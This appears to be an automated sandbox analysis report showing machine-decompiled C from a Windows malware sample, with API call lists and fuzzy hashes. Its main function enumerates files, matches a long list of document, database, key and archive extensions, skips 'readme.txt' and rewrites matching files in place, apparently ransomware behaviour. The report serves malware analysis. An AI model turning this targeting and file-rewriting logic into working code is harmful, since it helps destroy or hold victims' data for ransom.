                                                              								E00C6BB40(_t208, _t215 - 0x50, 0, 0x32);
                                                              								_t221 = _t217 + 0xc;
                                                              								_t132 = _t159;
                                                              								_t12 = _t132 + 1; // 0x1
                                                              								_t190 = _t12;
                                                              								do {
                                                              									_t170 =  *_t132;
                                                              									_t132 = _t132 + 1;
                                                              									__eflags = _t170;
                                                              								} while (_t170 != 0);
                                                              								__eflags = _t132 - _t190 - 0x32;
                                                              								if(_t132 - _t190 <= 0x32) {
                                                              									_t134 = _t159;
                                                              									_t13 = _t134 + 1; // 0x1
                                                              									_t191 = _t13;
                                                              									do {
                                                              										_t171 =  *_t134;
                                                              										_t134 = _t134 + 1;
                                                              										__eflags = _t171;
                                                              									} while (_t171 != 0);
                                                              									_t135 = _t134 - _t191;
                                                              									__eflags = _t134 - _t191;
                                                              								} else {
                                                              									_t135 = 0x32;
                                                              								}
                                                              								E00C6A6C0(_t215 - 0x50, _t159, _t135);
                                                              								_t222 = _t221 + 0xc;
                                                              								_t209 = 0;
                                                              								__eflags = 0;
                                                              								_t137 = _t215 - 0x50;
                                                              								_t187 = _t137 + 1;
                                                              								do {
                                                              									_t172 =  *_t137;
                                                              									_t137 = _t137 + 1;
                                                              									__eflags = _t172;
                                                              								} while (_t172 != 0);
                                                              								__eflags = _t137 != _t187;
                                                              								if(_t137 != _t187) {
                                                              									do {
                                                              										_t155 = E00C6AFFA( *((char*)(_t215 + _t209 - 0x50)));
                                                              										_t222 = _t222 + 4;
                                                              										 *((char*)(_t215 + _t209 - 0x50)) = _t155;
                                                              										_t209 = _t209 + 1;
                                                              										__eflags = _t209;
                                                              										_t156 = _t215 - 0x50;
                                                              										_t187 = _t156 + 1;
                                                              										do {
                                                              											_t176 =  *_t156;
                                                              											_t156 = _t156 + 1;
                                                              											__eflags = _t176;
                                                              										} while (_t176 != 0);
                                                              										__eflags = _t209 - _t156 - _t187;
                                                              									} while (_t209 < _t156 - _t187);
                                                              								}
                                                              								_t162 = _t215 - 0x50;
                                                              								_t139 = E00C6A360(".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA", _t215 - 0x50);
                                                              								_t217 = _t222 + 8;
                                                              								__eflags = _t139;
                                                              								if(_t139 != 0) {
                                                              									_t162 = "readme.txt";
                                                              									_t140 = _t215 - 0x15c4;
                                                              									while(1) {
                                                              										_t187 =  *_t140;
                                                              										__eflags = _t187 -  *_t162;
                                                              										if(_t187 !=  *_t162) {
                                                              											break;
                                                              										}
                                                              										__eflags = _t187;
                                                              										if(_t187 == 0) {
                                                              											L28:
                                                              											_t140 = 0;
                                                              										} else {
                                                              											_t187 =  *((intOrPtr*)(_t140 + 1));
                                                              											__eflags = _t187 - _t162[1];
                                                              											if(_t187 != _t162[1]) {
                                                              												break;
                                                              											} else {
                                                              												_t140 = _t140 + 2;
                                                              												_t162 =  &(_t162[2]);
                                                              												__eflags = _t187;
                                                              												if(_t187 != 0) {
                                                              													continue;
                                                              												} else {
                                                              													goto L28;
                                                              												}
                                                              											}
                                                              										}
                                                              										L30:
                                                              										__eflags = _t140;
                                                              										if(_t140 != 0) {
                                                              											E00C6BB40(_t209, _t215 - 0xa80, 0, 0x514);
                                                              											_t223 = _t217 + 0xc;
                                                              											_t142 = _t213;
                                                              											_t194 = _t142 + 1;
                                                              											do {
                                                              												_t173 =  *_t142;
                                                              												_t142 = _t142 + 1;
                                                              												__eflags = _t173;
                                                              											} while (_t173 != 0);
                                                              											_t143 = _t142 - _t194;
                                                              											__eflags =  *((char*)(_t143 + _t213 - 1)) - 0x5c;
                                                              											if( *((char*)(_t143 + _t213 - 1)) == 0x5c) {
                                                              												L38:
                                                              												_t187 = _t215 - 0x15c4;
                                                              												_push(_t215 - 0x15c4);
                                                              												_push(_t213);
                                                              												_push("%s%s");
                                                              												_push(_t215 - 0xa80);
                                                              											} else {
                                                              												_t151 = _t213;
                                                              												_t187 = _t151 + 1;
                                                              												do {
                                                              													_t174 =  *_t151;
                                                              													_t151 = _t151 + 1;
                                                              													__eflags = _t174;
                                                              												} while (_t174 != 0);
                                                              												_t152 = _t151 - _t187;
                                                              												__eflags =  *((char*)(_t152 + _t213 - 1)) - 0x2f;
                                                              												if( *((char*)(_t152 + _t213 - 1)) == 0x2f) {
                                                              													goto L38;
                                                              												} else {
                                                              													_push(_t215 - 0x15c4);
                                                              													_push(_t213);
                                                              													_push("%s\\%s");
                                                              													_push(_t215 - 0xa80);
                                                              												}
                                                              											}
                                                              											E00C69C35(_t209, _t213);
                                                              											 *((intOrPtr*)(_t215 - 4)) = 0;
                                                              											_t162 = _t215 - 0xa80;
                                                              											_t146 = L00C6A96D(_t215 - 0xa80, "rb+"); // executed
                                                              											_t217 = _t223 + 0x18;
                                                              											__eflags = _t146;
                                                              											if(__eflags != 0) {
                                                              												_push(_t146); // executed
                                                              												E00C6B1A7(_t159, _t187, _t209, _t213, __eflags); // executed
                                                              												_t210 =  *((intOrPtr*)(_t215 - 0x15f8));
                                                              												E00C6BB40( *((intOrPtr*)(_t215 - 0x15f8)),  *((intOrPtr*)(_t215 - 0x15f8)), 0, 0x100000);
                                                              												E00C6BB40( *((intOrPtr*)(_t215 - 0x15f8)),  *((intOrPtr*)(_t215 - 0x15fc)), 0, 0x100000);
                                                              												_t187 =  *(_t215 + 0x10);
                                                              												_t159 =  *(_t215 - 0x1600);
                                                              												E00B915D0( *(_t215 - 0x1600), _t215 - 0xa80,  *(_t215 + 0x10), _t210,  *((intOrPtr*)(_t215 - 0x15fc)));
                                                              												_t217 = _t217 + 0x28;
                                                              											}
                                                              											 *((intOrPtr*)(_t215 - 4)) = 0xfffffffe;
                                                              										}
                                                              										goto L75;
                                                              									}
                                                              									asm("sbb eax, eax");
                                                              									asm("sbb eax, 0xffffffff");
                                                              									goto L30;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				if(_t201 != 0xffffffff) {
                                                              					_t91 = FindClose(_t201); // executed
                                                              				}
                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0x10));
                                                              				_pop(_t212);
                                                              				_pop(_t214);
                                                              				_pop(_t160);
                                                              				return E00C69C26(_t91, _t160,  *(_t215 - 0x1c) ^ _t215, _t187, _t212, _t214);
                                                              			}


                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Find$CloseFileNext_memset_strncpy_strrchr
                                                              • String ID:
                                                              • API String ID: 1886237078-0
                                                              • Opcode ID: bc6ff43120c3114f476ebcf44292536cfe875c1acf975436ae17b5d8c7a25db2
                                                              • Instruction ID: 17b672b1633139ca16e6107bdd1885ebf94e0756723e44d6c51f334e3caef317
                                                              • Opcode Fuzzy Hash: bc6ff43120c3114f476ebcf44292536cfe875c1acf975436ae17b5d8c7a25db2
                                                              • Instruction Fuzzy Hash: C1F08272A0410A8BCF24CB58DD856BEB3B9EB88331F1406E9D82AA3290E73529419B51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 75%
                                                              			E00C6A637(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t13;
                                                              				void* _t22;
                                                              
                                                              				_push(0xc);
                                                              				_push(0xcbf9c0);
                                                              				E00C70838(__ebx, __edi, __esi);
                                                              				E00C6A4BD( *((intOrPtr*)(_t22 + 8)));
                                                              				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                              				_t13 = E00C6A59B(__ebx, __edx,  *((intOrPtr*)(_t22 + 8)),  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)),  *((intOrPtr*)(_t22 + 0x14))); // executed
                                                              				 *((intOrPtr*)(_t22 - 0x1c)) = _t13;
                                                              				 *(_t22 - 4) = 0xfffffffe;
                                                              				E00C6A67C();
                                                              				return E00C7087D( *((intOrPtr*)(_t22 - 0x1c)));
                                                              			}






                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00C6A646
                                                                • Part of subcall function 00C6A4BD: __lock.LIBCMT ref: 00C6A4E2
                                                              • __fseeki64_nolock.LIBCMT ref: 00C6A65C
                                                                • Part of subcall function 00C6A59B: __ftelli64_nolock.LIBCMT ref: 00C6A5C9
                                                                • Part of subcall function 00C6A59B: __flush.LIBCMT ref: 00C6A5D8
                                                                • Part of subcall function 00C6A59B: __fileno.LIBCMT ref: 00C6A60B
                                                                • Part of subcall function 00C6A59B: __lseeki64.LIBCMT ref: 00C6A612
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: __fileno__flush__fseeki64_nolock__ftelli64_nolock__lock__lock_file__lseeki64
                                                              • String ID:
                                                              • API String ID: 3130368316-0
                                                              • Opcode ID: 8ea855d46dc593c2373fc978ff74fa9aa1a7bf18de90ad9cb438a2d0c56f7516
                                                              • Instruction ID: 1add296dbf59f7c67f56b94976edeb95d41b4a4ed2f7ba7a7336c10c02e76ce1
                                                              • Opcode Fuzzy Hash: 8ea855d46dc593c2373fc978ff74fa9aa1a7bf18de90ad9cb438a2d0c56f7516
                                                              • Instruction Fuzzy Hash: D4E01A31840209FBDF11BFA4CC02BDD7B71AF04310F208158F4246A1A2C7358621AF82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E00C79B10(void* __edx, void* __esi, void* __eflags) {
                                                              				void* _t3;
                                                              				void* _t7;
                                                              				void* _t10;
                                                              				void* _t13;
                                                              				intOrPtr _t15;
                                                              				intOrPtr _t16;
                                                              
                                                              				_push(8);
                                                              				_push(0xcbffe0);
                                                              				_t3 = E00C70838(_t7, _t10, __esi);
                                                              				_t15 =  *0xcc9f1c; // 0x1
                                                              				if(_t15 == 0) {
                                                              					E00C6FD40(_t7, _t10, 6);
                                                              					 *((intOrPtr*)(_t13 - 4)) = 0;
                                                              					_t16 =  *0xcc9f1c; // 0x1
                                                              					if(_t16 == 0) {
                                                              						E00C793FB(_t7, __edx, _t10, 0, _t16); // executed
                                                              						 *0xcc9f1c =  *0xcc9f1c + 1;
                                                              					}
                                                              					 *((intOrPtr*)(_t13 - 4)) = 0xfffffffe;
                                                              					_t3 = E00C79B56();
                                                              				}
                                                              				return E00C7087D(_t3);
                                                              			}










                                                              APIs
                                                              • __lock.LIBCMT ref: 00C79B28
                                                                • Part of subcall function 00C6FD40: __mtinitlocknum.LIBCMT ref: 00C6FD56
                                                                • Part of subcall function 00C6FD40: __amsg_exit.LIBCMT ref: 00C6FD62
                                                                • Part of subcall function 00C6FD40: EnterCriticalSection.KERNEL32(?,?,?,00C70AAD,00000004,00CBFCC8,0000000C,00C69D5A,?,?,00000000,?,?,?,00B91010,00000021), ref: 00C6FD6A
                                                              • __tzset_nolock.LIBCMT ref: 00C79B39
                                                                • Part of subcall function 00C793FB: __lock.LIBCMT ref: 00C7941D
                                                                • Part of subcall function 00C793FB: __get_daylight.LIBCMT ref: 00C79432
                                                                • Part of subcall function 00C793FB: __invoke_watson.LIBCMT ref: 00C79441
                                                                • Part of subcall function 00C793FB: __get_daylight.LIBCMT ref: 00C7944D
                                                                • Part of subcall function 00C793FB: __invoke_watson.LIBCMT ref: 00C7945C
                                                                • Part of subcall function 00C793FB: __get_daylight.LIBCMT ref: 00C79468
                                                                • Part of subcall function 00C793FB: __invoke_watson.LIBCMT ref: 00C79477
                                                                • Part of subcall function 00C793FB: ____lc_codepage_func.LIBCMT ref: 00C7947F
                                                                • Part of subcall function 00C793FB: __getenv_helper_nolock.LIBCMT ref: 00C794A1
                                                                • Part of subcall function 00C793FB: _strlen.LIBCMT ref: 00C794DF
                                                                • Part of subcall function 00C793FB: __malloc_crt.LIBCMT ref: 00C794E6
                                                                • Part of subcall function 00C793FB: _strlen.LIBCMT ref: 00C794FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: __get_daylight__invoke_watson$__lock_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock
                                                              • String ID:
                                                              • API String ID: 4157481694-0
                                                              • Opcode ID: 797195cf0bf974d05adfa0ff71292f085d1327d1a0b4f1a4c12807eeac8ee408
                                                              • Instruction ID: a4c00dbcea3f143fd20cb1ceed25828666400493129031125e7b3303395658df
                                                              • Opcode Fuzzy Hash: 797195cf0bf974d05adfa0ff71292f085d1327d1a0b4f1a4c12807eeac8ee408
                                                              • Instruction Fuzzy Hash: 5EE01270484710D7CB31BBF1A816B1CB270EB14B61F60C12DF59CA61D1CA301642EBE6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00C6B2A7(int _a4) {
                                                              
                                                              				E00C6B27C(_a4);
                                                              				ExitProcess(_a4);
                                                              			}



                                                              0x00c6b2af
                                                              0x00c6b2b8

                                                              APIs
                                                              • ___crtCorExitProcess.LIBCMT ref: 00C6B2AF
                                                                • Part of subcall function 00C6B27C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00C6B2B4,?,?,00C6A2CD,000000FF,0000001E,?,00C716F3,?,00000001,?,?,00C6FCCA,00000018), ref: 00C6B286
                                                                • Part of subcall function 00C6B27C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C6B296
                                                              • ExitProcess.KERNEL32 ref: 00C6B2B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                              • String ID:
                                                              • API String ID: 2427264223-0
                                                              • Opcode ID: e23b733e6ef16913970a937fa5eb650b53c707955d1fabde46309890577f5cb9
                                                              • Instruction ID: 4de1cb397a9895b155161a9dcaf0d219151b6c202d36ec967799c4bf53f86ae3
                                                              • Opcode Fuzzy Hash: e23b733e6ef16913970a937fa5eb650b53c707955d1fabde46309890577f5cb9
                                                              • Instruction Fuzzy Hash: 45B09232000108BBCF112F26DC4E94E3FAAEB847A0B204024F80849031DF72AD92EAC8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 65%
                                                              			E00C6ADA3(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t16;
                                                              				intOrPtr _t21;
                                                              				void* _t31;
                                                              				intOrPtr _t38;
                                                              
                                                              				_push(0xc);
                                                              				_push(0xcbfa40);
                                                              				E00C70838(__ebx, __edi, __esi);
                                                              				if( *((intOrPtr*)(_t31 + 0xc)) == 0 ||  *((intOrPtr*)(_t31 + 0x10)) == 0) {
                                                              					L4:
                                                              					_t16 = 0;
                                                              				} else {
                                                              					_t38 =  *((intOrPtr*)(_t31 + 0x14));
                                                              					_t39 = _t38 != 0;
                                                              					if(_t38 != 0) {
                                                              						E00C6A4BD( *((intOrPtr*)(_t31 + 0x14)));
                                                              						 *((intOrPtr*)(_t31 - 4)) = 0;
                                                              						_t21 = E00C6AC41(__edx,  *((intOrPtr*)(_t31 + 8)),  *((intOrPtr*)(_t31 + 0xc)),  *((intOrPtr*)(_t31 + 0x10)),  *((intOrPtr*)(_t31 + 0x14))); // executed
                                                              						 *((intOrPtr*)(_t31 - 0x1c)) = _t21;
                                                              						 *((intOrPtr*)(_t31 - 4)) = 0xfffffffe;
                                                              						E00C6AE1B();
                                                              						_t16 =  *((intOrPtr*)(_t31 - 0x1c));
                                                              					} else {
                                                              						 *((intOrPtr*)(E00C6D8C9(_t39))) = 0x16;
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(0);
                                                              						E00C6FB6E(__edx, __edi, 0);
                                                              						goto L4;
                                                              					}
                                                              				}
                                                              				return E00C7087D(_t16);
                                                              			}








                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00C6ADEA
                                                                • Part of subcall function 00C6D8C9: __getptd_noexit.LIBCMT ref: 00C6D8C9
                                                                • Part of subcall function 00C6FB6E: __decode_pointer.LIBCMT ref: 00C6FB79
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: __decode_pointer__getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 3158947991-0
                                                              • Opcode ID: bdd256e1c78e332b8b76208a1962e7ecc15df7e57d070941592025a85c6ff88c
                                                              • Instruction ID: f35df5d524cce5dec4c456ac891954908a10c20f5447d81e10557a9a6c44f3d4
                                                              • Opcode Fuzzy Hash: bdd256e1c78e332b8b76208a1962e7ecc15df7e57d070941592025a85c6ff88c
                                                              • Instruction Fuzzy Hash: D9F04F31D01219EBCF31BFA49C4299E7B60AF04712F108465F82566192D7358A61FFD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E00B915D0(intOrPtr __ebx, CHAR* __edi, long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                              				intOrPtr _v8;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				long _t8;
                                                              				char _t9;
                                                              				intOrPtr _t11;
                                                              				CHAR* _t14;
                                                              				intOrPtr _t16;
                                                              
                                                              				_t14 = __edi;
                                                              				_t11 = __ebx;
                                                              				_t16 = _a8;
                                                              				_v8 = _a12;
                                                              				_t8 = GetFileAttributesA(__edi); // executed
                                                              				if(_t8 != 0xffffffff) {
                                                              					_t9 = L00C6A96D(__edi, 0xcbf778); // executed
                                                              					if(_t9 == 0) {
                                                              						L4:
                                                              						_t8 = _a4;
                                                              						if(_t8 != 0 && _t8 == 1) {
                                                              							_push(_t16);
                                                              							_push(_t11);
                                                              							return L00B911C0(_v8, _t14);
                                                              						}
                                                              					} else {
                                                              						_t8 = E00B910C0(__ebx, _t9, _t16);
                                                              						if(_t8 == 0 || _a4 != 1) {
                                                              							goto L4;
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t8;
                                                              			}












                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE ref: 00B915E2
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B910E1
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B91125
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B9114C
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B91164
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B91189
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: __fread_nolock$AttributesFile
                                                              • String ID:
                                                              • API String ID: 1831139023-0
                                                              • Opcode ID: 9728ec613f73baf52f0605894939a9738bc944ecb2ccf2c0ffa1ef4a866c6676
                                                              • Instruction ID: f3a9c7cc058ec12592fec4ad53fe3d10447db7fac88050f25aa4b318abe637bf
                                                              • Opcode Fuzzy Hash: 9728ec613f73baf52f0605894939a9738bc944ecb2ccf2c0ffa1ef4a866c6676
                                                              • Instruction Fuzzy Hash: 94F0BE35E00302578E20AA3DAE4553BB6D8DE81751F580DB8F894E2250EA31DC18EB73
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00BA33F0(intOrPtr _a4) {
                                                              				intOrPtr _t2;
                                                              				void* _t4;
                                                              				void* _t6;
                                                              				void* _t7;
                                                              				void* _t8;
                                                              
                                                              				_t2 =  *0xcc1284; // 0xba33f0
                                                              				if(_t2 == 0 || _t2 == E00BA33F0) {
                                                              					_t3 = _a4;
                                                              					if(_a4 > 0) {
                                                              						 *0xcc1280 = 0; // executed
                                                              						_t4 = E00C6A294(_t6, _t7, _t8, _t3); // executed
                                                              						return _t4;
                                                              					} else {
                                                              						return 0;
                                                              					}
                                                              				} else {
                                                              					goto __eax;
                                                              				}
                                                              			}









                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _malloc
                                                              • String ID:
                                                              • API String ID: 1579825452-0
                                                              • Opcode ID: eecff20b155070f91ed61441529cdb0007a715c50be11ef43db138562479acec
                                                              • Instruction ID: 10b216c07768a2472447bd7533025874c9a765baa94924c9b372e3d142124124
                                                              • Opcode Fuzzy Hash: eecff20b155070f91ed61441529cdb0007a715c50be11ef43db138562479acec
                                                              • Instruction Fuzzy Hash: 9DD0A76130C10056E7B18A19E84170A77C8E707F40F4804A4F80CC1250EB38C9059517
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 58%
                                                              			E00BA47A0(long* _a4) {
                                                              				signed int _t3;
                                                              
                                                              				_t3 = TlsFree( *_a4); // executed
                                                              				asm("sbb eax, eax");
                                                              				return  ~( ~_t3);
                                                              			}





                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Free
                                                              • String ID:
                                                              • API String ID: 3978063606-0
                                                              • Opcode ID: e129044edb422b1657594e40983de1b7f77a4478dd4f2b8b76d00c3967133a60
                                                              • Instruction ID: 3171958e3e89292b649d3048c31775f38f4630ca6b2c3fff8d37cacd69e3d700
                                                              • Opcode Fuzzy Hash: e129044edb422b1657594e40983de1b7f77a4478dd4f2b8b76d00c3967133a60
                                                              • Instruction Fuzzy Hash: A1B092703A4206AB8A148B34C954A2933A1AB85A02B100A58B006CB190CB30D8049A01
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00C73EB3() {
                                                              				void* _t1;
                                                              
                                                              				_t1 = E00C73E41(0); // executed
                                                              				return _t1;
                                                              			}





                                                              APIs
                                                              • __encode_pointer.LIBCMT ref: 00C73EB5
                                                                • Part of subcall function 00C73E41: TlsGetValue.KERNEL32(00000000,?,00C73EBA,00000000,00C79CC0,00CC99C0,00000000,00000314,?,00C713E2,00CC99C0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C73E53
                                                                • Part of subcall function 00C73E41: TlsGetValue.KERNEL32(00000005,?,00C73EBA,00000000,00C79CC0,00CC99C0,00000000,00000314,?,00C713E2,00CC99C0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C73E6A
                                                                • Part of subcall function 00C73E41: RtlEncodePointer.NTDLL(00000000,?,00C73EBA,00000000,00C79CC0,00CC99C0,00000000,00000314,?,00C713E2,00CC99C0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C73EA8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Value$EncodePointer__encode_pointer
                                                              • String ID:
                                                              • API String ID: 2585649348-0
                                                              • Opcode ID: d1141d789f2f235ad7d8d89ca010657446648e495bfbff0b7a12f25c8c72bdcd
                                                              • Instruction ID: ec1106a76dd642a844c49aadeec739ceba216456fe79a3eef8daec60671bd13e
                                                              • Opcode Fuzzy Hash: d1141d789f2f235ad7d8d89ca010657446648e495bfbff0b7a12f25c8c72bdcd
                                                              • Instruction Fuzzy Hash:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              C-Code - Quality: 94%
                                                              			E00BA7A30(char* _a4, char _a8) {
                                                              				signed int _v8;
                                                              				short _v10;
                                                              				void _v520;
                                                              				long _v524;
                                                              				void* _v536;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t43;
                                                              				char* _t46;
                                                              				signed int _t50;
                                                              				signed int _t51;
                                                              				long _t62;
